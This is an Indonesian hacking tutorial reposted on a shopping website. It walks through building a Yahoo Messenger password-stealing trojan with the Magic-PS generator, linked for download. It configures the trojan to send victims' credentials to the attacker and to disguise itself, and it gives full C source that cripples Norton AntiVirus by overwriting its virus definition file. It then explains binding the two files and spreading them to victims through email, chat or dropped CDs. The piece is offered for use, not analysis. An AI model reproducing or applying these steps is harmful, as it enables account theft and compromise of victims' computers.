Hijack Yahoo Account Dengan Trojan Lowongan kerja|tki ex magang jepang|resmi non imm|terbaru 2016


  kiri
titik tengah  CARI BARANG
banner kanan
---
  banner kiri
titik  MENU
banner kanan
  banner kiri
titik  ATURAN
banner kanan
---
  banner kiri
titik  LOGIN
banner kanan
Username
Password
 
---
  banner kiri
titik  CUSTOMER SERVICE
banner kanan
Yahoo Messenger:
Customer Services dagangku.comCustomer Services
  banner kiri
titik  BANNER
banner kanan

Video Shooting jakarta

Program Magang Jepang
User: Guest | Anda Belum Login
  TIPS & TRIK DETAIL
| Diposting oleh Rolys | Dibaca 1753 kali dari Website Dagangku.com

Hijack Yahoo Account Dengan Trojan

Hijack Yahoo Account Dengan Trojan

Kali ini kita main-main dengan trojan hhyuuukkkk ;) Trojannya nanti kita kasih tugas untuk mendapatkan Yahoo account berupa username + passwordnya. Trojan ini memang diciptakan dan selalu dikembangkan sesuai dengan perkembangan versi Yahoo Messenger. Trojannya kita buat dengan trojan generator kemudian kita binding (editor: binding <-> mengikat) dengan aplikasi pem-binding. Nanti hasil dari pembindingannya kita sebar di beberapa tempat, bisa melalui email, kirim langsung melalui YM atau dengan cara membuang (?) CD ditempat tertentu.

---// Bagaimana caranya?
------[ Persiapan

- Magic-PS Trojan Generator.
Anda download disini : http://magic.shabgard.org/Magic-PS-15se++.zip
- File Binder. Anda bisa memanfaatkan file binder apapun.
- C Compiler

------[Target Trojan

- User yang mempergunakan windows (-- yg pake linux aman bro ;)
- User yang masih bisa kena 'social engineering' (bro.. terserah gimana caranya deh.. biar tuh user bisa mati'in Antivirusnya....)
Kalo dia ga mau mati'in ya udah. Nanti kita matikan secara paksa dengan coding tertentu (editor: jangan maen clurit ya? ;) ).

------[Pembuatan Trojan

- Matikan semua Antivirus yang berada di komputer Anda (--hhikkzzz.. kalo ga dimatikan bakalan ga' bisa bikin trojan).
- Buatlah sebuah folder untuk menempatkan hasil trojan.
- Copy Magic-PS-15se++ ke dalam folder yang Anda buat, dan eksekusilah trojan generator tersebut.

Nanti tampilannya seperti ini :
+--------------------------------------------------+
| Magic-PS-15se |
+--------------------------------------------------+
| Victim |
| |
| [v] Send Y! Mess Pass [ ] Send OS Name |
| [ ] Send IP [v] Auto Startup |
| [ ] Send Computer Name [ ] Send win UserName |
| [ ] Disable taslmgr XP-2k [ ] Disable RegEdit |
| [v] Disbale Y! save pass [ ] Disable MsConfig |
| [V] Delete Mess Archive [ ] Melt After Install |
| [ ] Encode Pass +---------------------+ |
| FileName After Install | regsvr.exe | |
| +---------------------+ |
| [ ] Fake Error Message |
| +----------------------+ |
| Caption | | +-------+ |
| +----------------------+ | | |
| +----------------------+ | Test | |
| Message | | +-------+ |
| +----------------------+ |
| Your Yahoo! ID that logged pass send to it |
| +----------------------+ |
| Y! ID | | |
| +----------------------+ |
| Just type ID don't use @yahoo.com Ex: john_26 |
| [ ] Binder +------------+ +--------+ |
| [..] Extract to |TempDir | Run |Normal | |
| +------------+ +--------+ |
| Choose icon (only for .exe and .scr) |
| ( ) No icon ( ) JPG icon ( ) Setup icon |
| ( ) Zip icon ( ) RAR icon ( ) Love icon |
| ( ) Flash icon1 ( ) Flash icon2 ( ) Flash icon3 |
| ( ) Paint icon ( ) PDF icon ( ) Transparent |
| MPS Creator |
| +---------------+ |
| FileName |Sender.exe | |
| +---------------+ |
+--------------------------------------------------+
| Create MPS | DeCoder | About | Exit |
+--------------------------------------------------+

Keterangan Trojan :
[01] Victim, pada bagian ini Anda bisa memberikan tugas tambahan pada trojan yang Anda inginkan, misalkan saja mengambil IP Address si target.

[02] File After Install, jika trojan ini dieksekusi maka trojan tersebut akan melakukan penyamaran diri berupa file 'regsvr.exe'. Anda bisa memilih file penyamaran lainnya.

[03] Y! ID, isi bagian ini dengan account Yahoo milik Anda. Ingat! Account ID milik Anda juga harus Yahoo! dan proses pengisian pada bagian tersebut tidak disertai "@yahoo.com". Jadi cukup mengisi ID saja. Trojan akan memberikan account + password si target ke email tersebut!

[04] Choose icon, silahkan Anda memilih icon penyamaran trojan.

[05] FileName, ini merupakan file trojan hasil generator. File inilah yang nantinya Anda kirim ke target yang menjadi sasaran kita ;)

[06] Create MPS merupakan tombol yang men-generate trojan.

------[ Penyiapan Routin Pembunuh NAV :
Bye bye NAV. Nah, ini adalah routine yang bisa Anda gunakan untuk membunuh NAV secara paksa. Routine ini dibuat oleh teman saya : Magic_h2001 (Hai 'Magic_h2001'... thx for ur code).

//--- code ----//
/*
Kill Norton AntiVirus (All versions). Local Exploit.
Norton AV can not protect this file : VIRSCAN1.DAT
and can not Detect any virus after modify this file !
(editor: jadi ceritanye nih, file .DAT nya dioverwrite ama data sampah)
*/
#include
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff); if(!strcmp(dirName,""))
return 1;
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL, OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);
if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
}
* Silahkan Anda Compile source code tersebut menjadi sebuah file eksekusi.

//--- code ----//

------[ Proses Penyerangan

- Anggap saja dari beberapa proses tersebut diatas kita sudah mememiliki
2 (dua) file yaitu :
- sender.exe ----> trojan
- killanvir.exe ----> pembunuh NAV.
Kini saatnya Anda melakukan proses Binder terhadap keduanya. Yang terpenting pada proses Binder file yang bekerja pertama adalah killanvir.exe. Ini agar sebelum trojannya jalan, NAV sudah terbunuh lebih dulu. Setelah proses binding selesai kini saatnya Anda menyebarkan file tersebut ke target yang dituju. Terserah, dengan metode apapun (editor: sekali lagi, jangan pakai clurit! ;) ).

Anda dapat mendownload gratis Kumpulan software, tutorial, tools, artikel hacking dan aplikasi keamanan internet terlengkap
Pusat Ilmu Hacking dan system keamanan informasi

-------------------------------------------------------
Sumber:echo.or.id - echo|staff : y3dips,m0by,the_day,comex,z3r0byt3,k-159,c-a-s-e,s'to,lirva32, anonymous

Artikel Tips dan Trik lainnya

    Comment
Nama
:
Email
:
Kategori
:  
Komentar
:
   

Chat Dengan Pakar:
errorHidup adalah bangun,bangun adalah hidup.Apakah hidup dan bangun itu sama??

  inspirasi
mutiara nasehat  MUTIARA NASEHAT
nasehat

Kita Hidup karena DIHIDUPKAN....semoga tidak Meninggal karena DITINGGALKAN

-:-----------------:-

  hot link
titik  HOT LINK
hot
  inspirasi
mutiara nasehat  COMMENT
nasehat

From : tina
Tanggal : 04 Feb 2010
Pesan : setiap manusia di lahirkan dngn smua sifat n wtak yng berbeda........

Banner dagangku